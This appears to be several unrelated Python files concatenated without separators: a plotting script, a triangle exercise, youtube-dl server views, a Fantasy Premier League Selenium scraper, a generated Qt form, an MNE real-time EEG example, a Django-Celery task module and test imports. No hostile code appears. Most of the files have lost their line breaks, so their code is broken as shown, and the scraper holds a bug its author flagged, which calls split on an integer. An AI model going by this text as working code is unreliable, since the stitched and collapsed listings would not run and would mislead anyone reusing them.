if __name__ == '__main__':
    import matplotlib
    matplotlib.use('Agg')
    from matplotlib import rc
    rc('font', **{'family': 'serif', 'serif': 'Computer Modern Roman', 'size': 12})
    rc('text', usetex=True)

import numpy as np
import pylab as plt


def com_shape(fn):
    plt.figure(figsize=(4, 4))
    plt.clf()
    plt.plot([1., 1., 3., 3., 5., 5., 1.],
             [1., 7., 7., 3., 3., 1., 1.], 'k-', lw=3.)
    plt.grid(True, alpha=0.5)
    plt.xlabel(r'$x$ (cm)')
    plt.ylabel(r'$y$ (cm)')
    plt.axis('equal')
    plt.xlim(-1., 8.)
    plt.ylim(-1., 8.)
    plt.savefig(fn)
    return None


if __name__ == '__main__':
    fn = 'com_shape.pdf'
    com_shape(fn)
from .adagrad import Adagrad
from .adgd import Adgd
from .adgd_accel import AdgdAccel
from .gd import Gd
from .ig import Ig
from .nesterov import Nesterov
from .nest_line import NestLine
from .ogm import Ogm
from .polyak import Polyak
from .rest_nest import RestNest
# Redo exercise 35, adding a feature that reports which type of triangle is formed:
# equilateral: all three sides are equal;
# isosceles: two sides are equal;
# scalene: all sides are different
reta1 = float(input('Enter side 1: '))
reta2 = float(input('Enter side 2: '))
reta3 = float(input('Enter side 3: '))
if reta1 < reta2 + reta3 and reta2 < reta1 + reta3 and reta3 < reta1 + reta2:
    if reta1 == reta2 and reta2 == reta3:
        print('We have an equilateral triangle!')
    elif reta1 == reta2 or reta2 == reta3 or reta3 == reta1:
        print('We have an isosceles triangle!')
    else:
        print('We have a scalene triangle!')
else:
    print('These sides cannot form a triangle!')
from starlette.responses import JSONResponse from starlette.templating import Jinja2Templates from operator import itemgetter from pathlib import Path from ydl_server.config import app_config, get_finished_path from ydl_server.logdb import JobsDB, Job, Actions, JobType from datetime import datetime templates = Jinja2Templates(directory=str(Path(__file__).parent / "templates")) async def front_index(request): context = { 'request': request, 'ydl_version': request.app.state.ydlhandler.get_ydl_version(), 'ydl_name': request.app.state.ydlhandler.ydl_module_name, 'ydl_website': request.app.state.ydlhandler.ydl_website, } return templates.TemplateResponse('index.html', context=context) async def front_logs(request): context = { 'request': request, 'ydl_version': request.app.state.ydlhandler.get_ydl_version(), 'ydl_name': request.app.state.ydlhandler.ydl_module_name, 'ydl_website': request.app.state.ydlhandler.ydl_website, } return templates.TemplateResponse('logs.html', context=context) async def front_finished(request): context = { 'request': request, 'ydl_version': request.app.state.ydlhandler.get_ydl_version(), 'ydl_name': request.app.state.ydlhandler.ydl_module_name, 'ydl_website': request.app.state.ydlhandler.ydl_website, } return templates.TemplateResponse('finished.html', context=context) async def api_list_finished(request): root_dir = Path(get_finished_path()) matches = root_dir.glob('*') files = [{'name': f1.name, 'modified': f1.stat().st_mtime * 1000, 'children': sorted([{ 'name': f2.name, 'modified': f2.stat().st_mtime * 1000 } for f2 in f1.iterdir() if not f2.name.startswith('.')], key=itemgetter('modified'), reverse=True) if f1.is_dir() else None } for f1 in matches if not f1.name.startswith('.')] files = sorted(files, key=itemgetter('modified'), reverse=True) return JSONResponse({ "success": True, "files": files }) async def api_list_extractors(request): return JSONResponse(request.app.state.ydlhandler.get_ydl_extractors()) async def api_queue_size(request): db = JobsDB(readonly=True) jobs = db.get_all() return JSONResponse({ "success": True, "stats": { "queue": request.app.state.ydlhandler.queue.qsize(), "pending": len([job for job in jobs if job['status'] == "Pending"]), "running": len([job for job in jobs if job['status'] == "Running"]), "completed": len([job for job in jobs if job['status'] == "Completed"]), "failed": len([job for job in jobs if job['status'] == "Failed"]) } }) async def api_logs(request): db = JobsDB(readonly=True) return JSONResponse(db.get_all()) async def api_logs_purge(request): request.app.state.jobshandler.put((Actions.PURGE_LOGS, None)) return JSONResponse({"success": True}) async def api_logs_clean(request): request.app.state.jobshandler.put((Actions.CLEAN_LOGS, None)) return JSONResponse({"success": True}) async def api_queue_download(request): data = await request.form() if (app_config['ydl_server'].get('update_poll_delay_min') and (datetime.now() - app_config['ydl_last_update']).seconds > app_config['ydl_server'].get('update_poll_delay_min') * 60): job = Job("Youtube-dl Update", Job.PENDING, "", JobType.YDL_UPDATE, None, None) request.app.state.jobshandler.put((Actions.INSERT, job)) url = data.get("url") options = {'format': data.get("format")} if not url: return JSONResponse({ "success": False, "error": "'url' query parameter omitted" }) job = Job(url, Job.PENDING, "", JobType.YDL_DOWNLOAD, data.get("format"), url) request.app.state.jobshandler.put((Actions.INSERT, job)) print("Added url " + url + " to the download queue") return 
JSONResponse({"success": True, "url": url, "options": options}) async def api_metadata_fetch(request): data = await request.form() rc, stdout = request.app.state.ydlhandler.fetch_metadata(data.get("url")) if rc == 0: return JSONResponse(stdout) return JSONResponse({}, status_code=404) async def ydl_update(request): job = Job("Youtube-dl Update", Job.PENDING, "", JobType.YDL_UPDATE, None, None) request.app.state.jobshandler.put((Actions.INSERT, job)) return JSONResponse({ "success": True, })
import os import pickle import pandas as pd from datetime import datetime from time import sleep from tqdm import tqdm import re from selenium.webdriver.common.keys import Keys from selenium.webdriver.common.action_chains import ActionChains def scrape_current_player_stats(url, gameweek, mapper, driver): driver.get(url) sleep(2) players_dict = {} print('Collecting live player statistics..') for page in tqdm(range(1,19)): players = driver.find_elements_by_css_selector('#root > div:nth-child(2) > div > div > table > tbody > tr') # Get player stats for player in players: driver.execute_script("scroll(0,300);") ActionChains(driver).move_to_element(player).perform() sleep(0.5) # click on player info pop up player.find_element_by_tag_name('button').click() sleep(0.5) # Player name, club, position and fitness info_box = driver.find_element_by_css_selector('div.ElementDialog__Summary-gmefnd-0.eSbpQR') details = info_box.find_elements_by_tag_name('div')[0].text.split('\n') name, pos, club = details[0], details[1], details[2] # Get the player fitness and expected return if available try: fitness = driver.find_element_by_css_selector('div.sc-bdVaJa.edJDIA').text if '%' in fitness: fitness = int(''.join([x for x in fitness if x.isdigit()])) recovery_date = None elif 'Expected back' in fitness: fitness = 0 #! fix this recovery_date = datetime.strptime(f"{fitness.split('Expected back ')[1]} 2019", '%d %M %Y') elif 'Suspended' in fitness: fitness = 100 recovery_date = datetime.strptime(f"{fitness.split('Suspended until ')[1]} 2019", '%d %b %Y') else: fitness = 0 recovery_date = 'Unknown' except: fitness = 100 recovery_date = None # Get top level stats/info general_info = driver.find_element_by_css_selector('ul.ElementDialog__StatList-gmefnd-6.dYJASM').text.split('\n') info_tuples = [] for i in range(0,len(general_info),2): info_tuples.append((general_info[i], general_info[i+1])) ff_stats = driver.find_element_by_css_selector('ul.ElementDialog__FantasyStatList-gmefnd-10.ldSydD').text.split('\n') ff_tuples = [] for i in range(0,len(ff_stats),2): ff_tuples.append((ff_stats[i], ff_stats[i+1])) # Full player stats data for premier league season x = driver.page_source player_data = pd.read_html(x) if len(player_data) == 1: player_stats = None player_history = None elif len(player_data) == 2: if gameweek == 1: player_stats = None player_history = player_data[1] player_history.columns = [re.sub('\n','',x).strip().split(' ')[0] for x in player_history.columns] else: player_history = None player_stats = player_data[1] player_stats.columns = [re.sub('\n','',x).strip().split(' ')[0] for x in player_stats.columns] else: player_stats = player_data[1] player_stats.columns = [re.sub('\n','',x).strip().split(' ')[0] for x in player_stats.columns] player_history = player_data[2] player_history.columns = [re.sub('\n','',x).strip().split(' ')[0] for x in player_history.columns] # Close the info pop up ActionChains(driver).send_keys(Keys.ESCAPE).perform() players_dict[name] = {} players_dict[name]['details'] = {} players_dict[name]['details']['club'] = mapper[club.upper()] players_dict[name]['details']['position'] = pos players_dict[name]['details']['fitness'] = fitness players_dict[name]['details']['recovery_date'] = recovery_date players_dict[name]['stats'] = player_stats players_dict[name]['history'] = player_history for i, x in info_tuples: players_dict[name]['details'][i] = x for i, x in ff_tuples: players_dict[name]['details'][i] = x # Next page driver.find_element_by_css_selector('button:nth-child(4)').click() 
sleep(1) return players_dict def save_player_stats(player_stats): path = f'{os.path.dirname(os.getcwd())}\\data\\Players\\player_stats.pk' with open(path, 'wb') as file: pickle.dump(player_stats, file) def collect(driver, mapper): print('Collecting player statistics...') fixtures = f'{os.path.dirname(os.getcwd())}\\data\\Fixtures\\fixtures.csv' gameweek = min(pd.read_csv(fixtures)['gameweek']) stats_url = 'https://fantasy.premierleague.com/a/statistics/total_points' player_stats = scrape_current_player_stats(stats_url, gameweek, mapper, driver) save_player_stats(player_stats)
# -*- coding: utf-8 -*- ################################################################################ ## Form generated from reading UI file 'left_columnjzXejK.ui' ## ## Created by: Qt User Interface Compiler version 6.1.3 ## ## WARNING! All changes made in this file will be lost when recompiling UI file! ################################################################################ from qt_core import * class Ui_LeftColumn(object): def setupUi(self, LeftColumn): if not LeftColumn.objectName(): LeftColumn.setObjectName(u"LeftColumn") LeftColumn.resize(240, 600) self.main_pages_layout = QVBoxLayout(LeftColumn) self.main_pages_layout.setSpacing(0) self.main_pages_layout.setObjectName(u"main_pages_layout") self.main_pages_layout.setContentsMargins(5, 5, 5, 5) self.menus = QStackedWidget(LeftColumn) self.menus.setObjectName(u"menus") self.menu_1 = QWidget() self.menu_1.setObjectName(u"menu_1") self.verticalLayout = QVBoxLayout(self.menu_1) self.verticalLayout.setSpacing(5) self.verticalLayout.setObjectName(u"verticalLayout") self.verticalLayout.setSizeConstraint(QLayout.SetDefaultConstraint) self.verticalLayout.setContentsMargins(5, 5, 5, 5) self.frame_btn_1 = QFrame(self.menu_1) self.frame_btn_1.setObjectName(u"frame_btn_1") self.frame_btn_1.setMinimumSize(QSize(0, 40)) self.frame_btn_1.setMaximumSize(QSize(16777215, 40)) self.frame_btn_1.setFrameShape(QFrame.NoFrame) self.frame_btn_1.setFrameShadow(QFrame.Raised) self.btn_1_layout = QVBoxLayout(self.frame_btn_1) self.btn_1_layout.setSpacing(0) self.btn_1_layout.setObjectName(u"btn_1_layout") self.btn_1_layout.setContentsMargins(0, 0, 0, 0) self.verticalLayout.addWidget(self.frame_btn_1) self.frame_btn_2 = QFrame(self.menu_1) self.frame_btn_2.setObjectName(u"frame_btn_2") self.frame_btn_2.setMinimumSize(QSize(0, 40)) self.frame_btn_2.setMaximumSize(QSize(16777215, 40)) self.frame_btn_2.setFrameShape(QFrame.NoFrame) self.frame_btn_2.setFrameShadow(QFrame.Raised) self.btn_2_layout = QVBoxLayout(self.frame_btn_2) self.btn_2_layout.setSpacing(0) self.btn_2_layout.setObjectName(u"btn_2_layout") self.btn_2_layout.setContentsMargins(0, 0, 0, 0) self.verticalLayout.addWidget(self.frame_btn_2) self.frame_btn_3 = QFrame(self.menu_1) self.frame_btn_3.setObjectName(u"frame_btn_3") self.frame_btn_3.setMinimumSize(QSize(0, 40)) self.frame_btn_3.setMaximumSize(QSize(16777215, 40)) self.frame_btn_3.setFrameShape(QFrame.NoFrame) self.frame_btn_3.setFrameShadow(QFrame.Raised) self.btn_3_layout = QVBoxLayout(self.frame_btn_3) self.btn_3_layout.setSpacing(0) self.btn_3_layout.setObjectName(u"btn_3_layout") self.btn_3_layout.setContentsMargins(0, 0, 0, 0) self.verticalLayout.addWidget(self.frame_btn_3) self.frame_btn_4 = QFrame(self.menu_1) self.frame_btn_4.setObjectName(u"frame_btn_4") self.frame_btn_4.setMinimumSize(QSize(0, 40)) self.frame_btn_4.setMaximumSize(QSize(16777215, 40)) self.frame_btn_4.setFrameShape(QFrame.NoFrame) self.frame_btn_4.setFrameShadow(QFrame.Raised) self.btn_4_layout = QVBoxLayout(self.frame_btn_4) self.btn_4_layout.setSpacing(0) self.btn_4_layout.setObjectName(u"btn_4_layout") self.btn_4_layout.setContentsMargins(0, 0, 0, 0) self.verticalLayout.addWidget(self.frame_btn_4) self.verticalSpacer = QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding) self.verticalLayout.addItem(self.verticalSpacer) self.menus.addWidget(self.menu_1) self.menu_2 = QWidget() self.menu_2.setObjectName(u"menu_2") self.verticalLayout_2 = QVBoxLayout(self.menu_2) self.verticalLayout_2.setSpacing(5) 
self.verticalLayout_2.setObjectName(u"verticalLayout_2") self.verticalLayout_2.setContentsMargins(5, 5, 5, 5) self.label_2 = QLabel(self.menu_2) self.label_2.setObjectName(u"label_2") font = QFont() font.setPointSize(16) self.label_2.setFont(font) self.label_2.setStyleSheet(u"font-size: 16pt") self.label_2.setAlignment(Qt.AlignCenter) self.verticalLayout_2.addWidget(self.label_2) self.menus.addWidget(self.menu_2) self.main_pages_layout.addWidget(self.menus) self.retranslateUi(LeftColumn) self.menus.setCurrentIndex(0) QMetaObject.connectSlotsByName(LeftColumn) # setupUi def retranslateUi(self, LeftColumn): LeftColumn.setWindowTitle(QCoreApplication.translate("LeftColumn", u"Form", None)) self.label_2.setText(QCoreApplication.translate("LeftColumn", u"Menu 2 - Left Menu", None)) # retranslateUi
""" ======================================================== Compute real-time evoked responses with FieldTrip client ======================================================== This example demonstrates how to connect the MNE real-time system to the Fieldtrip buffer using FieldTripClient class. This example was tested in simulation mode neuromag2ft --file MNE-sample-data/MEG/sample/sample_audvis_raw.fif using a modified version of neuromag2ft available at http://neuro.hut.fi/~mainak/neuromag2ft-2.0.0.zip to run the FieldTrip buffer. Then running this example acquires the data on the client side. Since the Fieldtrip buffer does not contain all the measurement information required by the MNE real-time processing pipeline, an info dictionary must be provided to instantiate FieldTripClient. Alternatively, the MNE-Python script will try to guess the missing measurement info from the Fieldtrip Header object. Together with RtEpochs, this can be used to compute evoked responses using moving averages. """ # Author: Mainak Jas <[email protected]> # # License: BSD (3-clause) import matplotlib.pyplot as plt import mne from mne.viz import plot_events from mne.realtime import FieldTripClient, RtEpochs print(__doc__) # select the left-auditory condition event_id, tmin, tmax = 1, -0.2, 0.5 # user must provide list of bad channels because # FieldTrip header object does not provide that bads = ['MEG 2443', 'EEG 053'] plt.ion() # make plot interactive _, ax = plt.subplots(2, 1, figsize=(8, 8)) # create subplots with FieldTripClient(host='localhost', port=1972, tmax=150, wait_max=10) as rt_client: # get measurement info guessed by MNE-Python raw_info = rt_client.get_measurement_info() # select gradiometers picks = mne.pick_types(raw_info, meg='grad', eeg=False, eog=True, stim=True, exclude=bads) # create the real-time epochs object rt_epochs = RtEpochs(rt_client, event_id, tmin, tmax, stim_channel='STI 014', picks=picks, reject=dict(grad=4000e-13, eog=150e-6), decim=1, isi_max=10.0, proj=None) # start the acquisition rt_epochs.start() for ii, ev in enumerate(rt_epochs.iter_evoked()): print("Just got epoch %d" % (ii + 1)) ev.pick_types(meg=True, eog=False) if ii == 0: evoked = ev else: evoked += ev ax[0].cla() ax[1].cla() # clear axis plot_events(rt_epochs.events[-5:], sfreq=ev.info['sfreq'], first_samp=-rt_client.tmin_samp, axes=ax[0]) evoked.plot(axes=ax[1]) # plot on second subplot ax[1].set_title('Evoked response for gradiometer channels' '(event_id = %d)' % event_id) plt.pause(0.05) plt.draw() plt.close()
import os import base64 import logging import pickle import uuid import import_string from datetime import timedelta from django.core.management import call_command, get_commands from django.core.exceptions import ImproperlyConfigured from django.core.cache import caches from django.db import close_old_connections, transaction from django.db.utils import InterfaceError, OperationalError from django.utils.timezone import now, localtime try: from celery import Task, shared_task, current_app from celery.result import AsyncResult from celery.exceptions import CeleryError, TimeoutError from kombu.utils import uuid as task_uuid from kombu import serialization except ImportError: raise ImproperlyConfigured('Missing celery library, please install it') from .celery import CeleryQueueEnum from .config import settings logger = logging.getLogger(__name__) cache = caches[settings.CACHE_NAME] def default_unique_key_generator(task, prefix, task_args, task_kwargs): task_args = task_args or () task_kwargs = task_kwargs or {} _, _, data = serialization.dumps( (list(task_args), task_kwargs), task._get_app().conf.task_serializer, ) return str(uuid.uuid5(uuid.NAMESPACE_DNS, ':'.join((prefix, task.name, data)))) class NotTriggeredCeleryError(CeleryError): pass class IgnoredResult: state = 'IGNORED' id = None def get(self, *args, **kwargs): return None def successful(self): return False def failed(self): return False @property def task_id(self): return self.id class ResultWrapper: def __init__(self, invocation_id, task, args, kwargs, options, result=None): self._invocation_id = invocation_id self._result = result self._task = task self._args = args self._kwargs = kwargs self._options = options def on_apply(self): pass def on_trigger(self): pass def on_unique(self): pass def on_ignored(self): pass def on_timeout(self): pass def set_result(self, result): self._result = result def set_options(self, options): self._options = options def then(self, *args, **kwargs): return self._result.then(*args, **kwargs) def get(self, *args, **kwargs): if self._result is None: raise NotTriggeredCeleryError('Celery task has not been triggered yet') else: try: return self._result.get(*args, **kwargs) except TimeoutError as ex: self.timeout(ex) raise ex def timeout(self, ex): self._task.on_invocation_timeout( self._invocation_id, self._args, self._kwargs, self.task_id, ex, self._options, self ) @property def state(self): return 'WAITING' if not self._result else self._result.state def successful(self): return self._result is not None and self._result.successful() def failed(self): return self._result is not None and self._result.failed() @property def id(self): return None if self._result is None else self._result.task_id @property def task_id(self): return self.id class DjangoTask(Task): abstract = True # Support set retry delay in list. 
Retry countdown value is get from list where index is attempt # number (request.retries) default_retry_delays = None # Unique task if task with same input already exists no extra task is created and old task result is returned unique = False unique_key_generator = default_unique_key_generator _stackprotected = True ignore_task_after_success_timedelta = None result_wrapper_class = ResultWrapper def __new__(cls, *args, **kwargs): queue = getattr(cls, 'queue', None) if isinstance(queue, CeleryQueueEnum): cls.queue = queue.queue_name for k, v in queue.default_task_kwargs.items(): if getattr(cls, k, None) is None: setattr(cls, k, v) return super().__new__(cls, *args, **kwargs) @property def max_queue_waiting_time(self): return settings.DEFAULT_TASK_MAX_QUEUE_WAITING_TIME @property def stale_time_limit(self): return settings.DEFAULT_TASK_STALE_TIME_LIMIT def on_invocation_apply(self, invocation_id, args, kwargs, options, result): """ Method is called when task was applied with the requester. :param invocation_id: UUID of the requester invocation :param args: input task args :param kwargs: input task kwargs :param options: input task options :param result: result which will be finally returned """ result.on_apply() def on_invocation_trigger(self, invocation_id, args, kwargs, task_id, options, result): """ Task has been triggered and placed in the queue. :param invocation_id: UUID of the requester invocation :param args: input task args :param kwargs: input task kwargs :param task_id: UUID of the celery task :param options: input task options :param result: result which will be finally returned """ result.on_trigger() def on_invocation_unique(self, invocation_id, args, kwargs, task_id, options, result): """ Task has been triggered but the same task is already active. Therefore only pointer to the active task is returned. :param invocation_id: UUID of the requester invocation :param args: input task args :param kwargs: input task kwargs :param task_id: UUID of the celery task :param options: input task options :param result: result which will be finally returned """ result.on_unique() def on_invocation_ignored(self, invocation_id, args, kwargs, task_id, options, result): """ Task has been triggered but the task has set ignore_task_after_success_timedelta and task was sucessfully completed in this timeout. Therefore no new task is invoked. :param invocation_id: UUID of the requester invocation :param args: input task args :param kwargs: input task kwargs :param task_id: UUID of the celery task :param options: input task options :param result: result which will be finally returned """ result.on_ignored() def on_invocation_timeout(self, invocation_id, args, kwargs, task_id, ex, options, result): """ Task has been joined to another unique async result. :param invocation_id: UUID of the requester invocation :param args: input task args :param kwargs: input task kwargs :param task_id: UUID of the celery task :param ex: celery TimeoutError :param options: input task options :param result: result which will be finally returned """ result.on_timeout() def on_task_start(self, task_id, args, kwargs): """ Task has been started with worker. :param task_id: UUID of the celery task :param args: input task args :param kwargs: input task kwargs """ pass def on_task_retry(self, task_id, args, kwargs, exc, eta): """ Task failed but will be retried. 
:param task_id: UUID of the celery task :param args: task args :param kwargs: task kwargs :param exc: raised exception which caused retry :param eta: time to next retry """ pass def on_task_failure(self, task_id, args, kwargs, exc, einfo): """ Task failed and will not be retried. :param task_id: UUID of the celery task :param args: task args :param kwargs: task kwargs :param exc: raised exception :param einfo: exception traceback """ pass def on_task_success(self, task_id, args, kwargs, retval): """ Task was successful. :param task_id: UUID of the celery task :param args: task args :param kwargs: task kwargs :param retval: task result """ pass def on_failure(self, exc, task_id, args, kwargs, einfo): super().on_failure(exc, task_id, args, kwargs, einfo) self.on_task_failure(task_id, args, kwargs, exc, einfo) self._clear_unique_key(args, kwargs) def on_success(self, retval, task_id, args, kwargs): super().on_success(retval, task_id, args, kwargs) self.on_task_success(task_id, args, kwargs, retval) self._clear_unique_key(args, kwargs) self._set_ignore_task_after_success(args, kwargs) def __call__(self, *args, **kwargs): """ Overrides parent which works with thread stack. We didn't want to allow change context which was generated in one of apply methods. Call task directly is now disallowed. """ req = self.request_stack.top if not req or req.called_directly: raise CeleryError( 'Task cannot be called directly. Please use apply, apply_async or apply_async_on_commit methods' ) if req._protected: raise CeleryError('Request is protected') # request is protected (no usage in celery but get from function _install_stack_protection in # celery library) req._protected = 1 # Every set attr is sent here self.on_task_start(req.id, args, kwargs) return self._start(*args, **kwargs) def _start(self, *args, **kwargs): return self.run(*args, **kwargs) def _get_unique_key(self, task_args, task_kwargs): return self.unique_key_generator( settings.UNIQUE_TASK_KEY_PREFIX, task_args, task_kwargs ) if self.unique else None def _get_ignore_task_after_success_key(self, task_args, task_kwargs): return ( self.unique_key_generator( settings.IGNORE_TASK_AFTER_SUCCESS_KEY_PREFIX, task_args, task_kwargs ) if self.ignore_task_after_success_timedelta else None ) def is_processing(self, args=None, kwargs=None): unique_key = self._get_unique_key(args, kwargs) if unique_key is None: raise CeleryError('Process check can be performed for only unique tasks') return cache.get(unique_key) is not None def _ignore_task_after_success(self, key): return key and cache.get(key) def _set_ignore_task_after_success(self, task_args, task_kwargs): ignore_task_after_success_key = self._get_ignore_task_after_success_key(task_args, task_kwargs) if ignore_task_after_success_key: current_time = localtime() cache.add( ignore_task_after_success_key, True, (current_time + self.ignore_task_after_success_timedelta - current_time).total_seconds() ) def _clear_unique_key(self, task_args, task_kwargs): unique_key = self._get_unique_key(task_args, task_kwargs) if unique_key: cache.delete(unique_key) def _get_unique_task_id(self, unique_key, task_id, stale_time_limit): if unique_key and not stale_time_limit: raise CeleryError('For unique tasks is require set task stale_time_limit') if unique_key and not self._get_app().conf.task_always_eager: if cache.add(unique_key, task_id, stale_time_limit): return task_id else: unique_task_id = cache.get(unique_key) return ( unique_task_id if unique_task_id else self._get_unique_task_id(unique_key, task_id, 
stale_time_limit) ) else: return task_id def _compute_eta(self, eta, countdown, trigger_time): if countdown is not None: return trigger_time + timedelta(seconds=countdown) elif eta: return eta else: return trigger_time def _compute_expires(self, expires, time_limit, stale_time_limit, trigger_time): expires = self.expires if expires is None else expires if expires is not None: return trigger_time + timedelta(seconds=expires) if isinstance(expires, int) else expires elif stale_time_limit is not None and time_limit is not None: return trigger_time + timedelta(seconds=stale_time_limit - time_limit) else: return None def _get_time_limit(self, time_limit): if time_limit is not None: return time_limit elif self.time_limit is not None: return self.time_limit else: return self._get_app().conf.task_time_limit def _get_soft_time_limit(self, soft_time_limit): if soft_time_limit is not None: return soft_time_limit elif self.soft_time_limit is not None: return self.soft_time_limit else: return self._get_app().conf.task_soft_time_limit def _get_stale_time_limit(self, expires, time_limit, stale_time_limit, trigger_time): if stale_time_limit is not None: return stale_time_limit elif self.stale_time_limit is not None: return self.stale_time_limit elif time_limit is not None and self.max_queue_waiting_time: autoretry_for = getattr(self, 'autoretry_for', None) if autoretry_for and self.default_retry_delays: return ( (time_limit + self.max_queue_waiting_time) * len(self.default_retry_delays) + 1 + sum(self.default_retry_delays) ) elif autoretry_for: return ( (time_limit + self.max_queue_waiting_time + self.default_retry_delay) * self.max_retries + time_limit + self.max_queue_waiting_time ) else: return time_limit + self.max_queue_waiting_time else: return None def _apply_and_get_result(self, args, kwargs, invocation_id, is_async=False, **options): if is_async: return self._call_super_apply_async( args=args, kwargs=kwargs, is_async=is_async, invocation_id=invocation_id, **options ) else: return super().apply( args=args, kwargs=kwargs, is_async=is_async, invocation_id=invocation_id, **options ) def _trigger(self, result, args, kwargs, invocation_id, task_id=None, eta=None, countdown=None, expires=None, time_limit=None, soft_time_limit=None, stale_time_limit=None, ignore_task_after_success=None, is_async=True, **options): app = self._get_app() task_id = task_id or task_uuid() time_limit = self._get_time_limit(time_limit) trigger_time = now() eta = self._compute_eta(eta, countdown, trigger_time) countdown = None stale_time_limit = self._get_stale_time_limit(expires, time_limit, stale_time_limit, trigger_time) expires = self._compute_expires(expires, time_limit, stale_time_limit, trigger_time) options.update(dict( invocation_id=invocation_id, task_id=task_id, trigger_time=trigger_time, time_limit=time_limit, soft_time_limit=self._get_soft_time_limit(soft_time_limit), eta=eta, countdown=countdown, expires=expires, is_async=is_async, stale_time_limit=stale_time_limit )) ignore_task_after_success = ( ignore_task_after_success if ignore_task_after_success is not None else self.ignore_task_after_success_timedelta is not None ) ignore_task_after_success_key = ( self._get_ignore_task_after_success_key(args, kwargs) if ignore_task_after_success else None ) if self._ignore_task_after_success(ignore_task_after_success_key): result.set_options(options) result.set_result(IgnoredResult()) self.on_invocation_ignored(invocation_id, args, kwargs, task_id, options, result) else: unique_key = self._get_unique_key(args, kwargs) 
unique_task_id = self._get_unique_task_id(unique_key, task_id, stale_time_limit) if is_async and unique_task_id != task_id: options['task_id'] = unique_task_id result.set_options(options) self.on_invocation_unique(invocation_id, args, kwargs, unique_task_id, options, result) result.set_result(AsyncResult(unique_task_id, app=app)) else: result.set_options(options) self.on_invocation_trigger(invocation_id, args, kwargs, task_id, options, result) result.set_result(self._apply_and_get_result(args, kwargs, **options)) def _first_apply(self, args=None, kwargs=None, invocation_id=None, is_async=True, is_on_commit=False, using=None, **options): invocation_id = invocation_id or task_uuid() apply_time = now() app = self._get_app() queue = str(options.get('queue', getattr(self, 'queue', app.conf.task_default_queue))) options.update(dict( queue=queue, is_async=is_async, invocation_id=invocation_id, apply_time=apply_time, is_on_commit=is_on_commit, using=using, )) result = self.result_wrapper_class(invocation_id, self, args, kwargs, options) self.on_invocation_apply(invocation_id, args, kwargs, options, result) if is_on_commit: self_inst = self def _apply_on_commit(): self_inst._trigger(result, args=args, kwargs=kwargs, **options) transaction.on_commit(_apply_on_commit, using=using) else: self._trigger(result, args=args, kwargs=kwargs, **options) return result def apply_async_on_commit(self, args=None, kwargs=None, using=None, **options): return self._first_apply(args=args, kwargs=kwargs, is_async=True, is_on_commit=True, using=using, **options) def apply(self, args=None, kwargs=None, **options): if 'retries' in options or 'is_async' in options: return super().apply(args=args, kwargs=kwargs, **options) else: return self._first_apply(args=args, kwargs=kwargs, is_async=False, **options) def _call_super_apply_async(self, args=None, kwargs=None, task_id=None, **options): """ Apply async can be called from two sources. By hand from executor or automatically via retry function. If retry function is used id is get from request. 
But we sometimes we need to change options before it (some options is not transfered to the worker for example properties, therefore not all changed options in _first_apply method is available in retry method) """ task_id = task_id or self.request.id or uuid() if settings.AUTO_SQS_MESSAGE_GROUP_ID: if 'MessageGroupId' not in options: options['MessageGroupId'] = task_id return super().apply_async(args=args, kwargs=kwargs, task_id=task_id, **options) def apply_async(self, args=None, kwargs=None, **options): try: if self.request.id: return self._call_super_apply_async(args=args, kwargs=kwargs, **options) else: return self._first_apply( args=args, kwargs=kwargs, is_async=True, **options ) except (InterfaceError, OperationalError) as ex: logger.warning('Closing old database connections, following exception thrown: %s', str(ex)) close_old_connections() raise ex def delay_on_commit(self, *args, **kwargs): options = kwargs.pop('options', {}) self.apply_async_on_commit(args, kwargs, **options) def retry(self, args=None, kwargs=None, exc=None, throw=True, eta=None, countdown=None, max_retries=None, default_retry_delays=None, **options): max_retries = max_retries or self.max_retries if default_retry_delays or (eta is None and countdown is None and self.default_retry_delays): default_retry_delays = self.default_retry_delays if default_retry_delays is None else default_retry_delays max_retries = len(default_retry_delays) countdown = default_retry_delays[self.request.retries] if self.request.retries < max_retries else None if not eta and countdown is None: countdown = self.default_retry_delay if not eta: eta = now() + timedelta(seconds=countdown) if max_retries is None or self.request.retries < max_retries: # In the opposite way task will be failed self.on_task_retry(self.request.id, args, kwargs, exc, eta) return super().retry( args=args, kwargs=kwargs, exc=exc, throw=throw, eta=eta, max_retries=max_retries, **options ) def apply_async_and_get_result(self, args=None, kwargs=None, timeout=None, propagate=True, **options): """ Apply task in an asynchronous way, wait defined timeout and get AsyncResult or TimeoutError :param args: task args :param kwargs: task kwargs :param timeout: timout in seconds to wait for result :param propagate: propagate or not exceptions from celery task :param options: apply_async method options :return: AsyncResult or TimeoutError """ result = self.apply_async(args=args, kwargs=kwargs, **options) if timeout is None or timeout > 0: return result.get(timeout=timeout, propagate=propagate) else: ex = TimeoutError('The operation timed out.') result.timeout(ex) raise ex def get_command_kwargs(self): return {} def obj_to_string(obj): return base64.encodebytes(pickle.dumps(obj)).decode('utf8') def string_to_obj(obj_string): return pickle.loads(base64.decodebytes(obj_string.encode('utf8'))) def get_command_task_name(command_name): if command_name not in get_commands(): raise ImproperlyConfigured(f'Cannot generate celery task from command "{command_name}", command not found') app_name = get_commands()[command_name] return 'command.{}.{}'.format(app_name, command_name) def get_django_command_task(command_name): command_task_name = get_command_task_name(command_name) if command_task_name not in current_app.tasks: raise ImproperlyConfigured( 'Command was not found please check DJANGO_CELERY_EXTENSIONS_AUTO_GENERATE_TASKS_DJANGO_COMMANDS setting' ) return current_app.tasks[command_task_name] def auto_convert_commands_to_tasks(): for name in settings.AUTO_GENERATE_TASKS_DJANGO_COMMANDS: 
task_name = get_command_task_name(name) def generate_command_task(command_name, task_name): shared_task_kwargs = { **dict( bind=True, name=task_name, ignore_result=True, ), **(settings.AUTO_GENERATE_TASKS_DEFAULT_CELERY_KWARGS or {}), **(settings.AUTO_GENERATE_TASKS_DJANGO_COMMANDS[command_name] or {}) } if 'autoretry_for' in shared_task_kwargs: shared_task_kwargs['autoretry_for'] = [ import_string(exception_class) if isinstance(exception_class, str) else exception_class for exception_class in shared_task_kwargs['autoretry_for'] ] @shared_task( **shared_task_kwargs ) def command_task(self, command_args=None, **kwargs): command_args = [] if command_args is None else command_args call_command( command_name, settings=os.environ.get('DJANGO_SETTINGS_MODULE'), *command_args, **self.get_command_kwargs() ) generate_command_task(name, task_name)
from ex1 import sum_list_for, sum_list_reduce, sum_list_sum_func
from ex2 import list_comp
from ex3 import boom_7_for, boom_7_list_comprehension, boom_7_map
from ex4 import dict_to_list, dict_to_list_comp
from ex5 import count_number_of_arguments
from ex6 import func
from ex7 import make_adder

print("Test ex1 sum list in for function")
